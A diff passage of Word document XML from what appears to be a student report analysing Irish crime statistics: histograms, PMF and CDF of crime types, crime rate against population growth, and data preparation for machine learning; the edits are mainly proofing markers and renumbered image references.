+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>By u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>sing the method describe, we can get important information from the result</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -8536,11 +8955,47 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
-        <w:t>Applyiing the .describe() method on crime_df:</w:t>
+        <w:t>Applyiing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>the .describe</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">() method on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8622,6 +9077,7 @@
                               </w:rPr>
                               <w:t xml:space="preserve">From this </w:t>
                             </w:r>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8638,6 +9094,7 @@
                               </w:rPr>
                               <w:t>describe</w:t>
                             </w:r>
+                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8778,6 +9235,7 @@
                         </w:rPr>
                         <w:t xml:space="preserve">From this </w:t>
                       </w:r>
+                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8794,6 +9252,7 @@
                         </w:rPr>
                         <w:t>describe</w:t>
                       </w:r>
+                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -8921,7 +9380,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8987,6 +9446,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9017,7 +9477,24 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9107,7 +9584,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9165,38 +9642,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Figure 05 – histogram of crime_df</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -9208,8 +9661,37 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9223,14 +9705,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>There are some insights that you can get from the bin plot:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9244,8 +9720,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>There are some insights that you can get from the bin plot:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9259,14 +9741,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9280,8 +9756,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9295,14 +9777,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9316,6 +9792,27 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -9360,8 +9857,21 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:r>
-        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pmf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9396,7 +9906,15 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>Before getting the PMF and CDF information, its important to prepare the dataset.</w:t>
+        <w:t xml:space="preserve">Before getting the PMF and CDF information, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> important to prepare the dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9446,7 +9964,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9570,7 +10088,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9641,8 +10159,21 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pmi</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>pmi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9709,7 +10240,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9767,7 +10298,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9857,8 +10388,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or 0.000000208</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>0.000000208</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9878,7 +10420,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>The distribution of crime types is skewed, with a few crime types accounting for a large proportion of the total number of crimes.</w:t>
+        <w:t xml:space="preserve">The distribution of crime types is skewed, with a few </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>crime</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> types accounting for a large proportion of the total number of crimes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9978,7 +10540,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10034,8 +10596,17 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>CDF of crime_df</w:t>
-      </w:r>
+        <w:t xml:space="preserve">CDF of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10146,7 +10717,41 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>To compare population growth and crime rates, we will filter the population dataframe to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
+        <w:t xml:space="preserve">To compare population growth and crime rates, we will filter the population </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10262,7 +10867,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10314,8 +10919,28 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Figure 08 – Line Chart comparing crime rate and population growth</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Figure 08 – Line Chart comparing crime rate and population </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>growth</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10415,7 +11040,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10491,7 +11116,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10527,7 +11152,27 @@
           <w:iCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>Figure 08 – Heatmap correlation coefficient popularion and crime</w:t>
+        <w:t xml:space="preserve">Figure 08 – Heatmap correlation coefficient </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>popularion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and crime</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10615,12 +11260,21 @@
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t>For the purpose of developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+        <w:t>For the purpose of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10637,7 +11291,23 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">These tasks will be performed in the jupyter notebook: </w:t>
+        <w:t xml:space="preserve">These tasks will be performed in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notebook: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10795,7 +11465,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10843,13 +11513,13 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F811877" wp14:editId="16C03FF1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F811877" wp14:editId="379867C2">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
-                  <wp:posOffset>3108960</wp:posOffset>
+                  <wp:posOffset>3095513</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1292860</wp:posOffset>
+                  <wp:posOffset>1212177</wp:posOffset>
                 </wp:positionV>
                 <wp:extent cx="2578100" cy="2368550"/>
                 <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
@@ -10898,25 +11568,55 @@
                           </w:p>
                           <w:p>
                             <w:pPr>
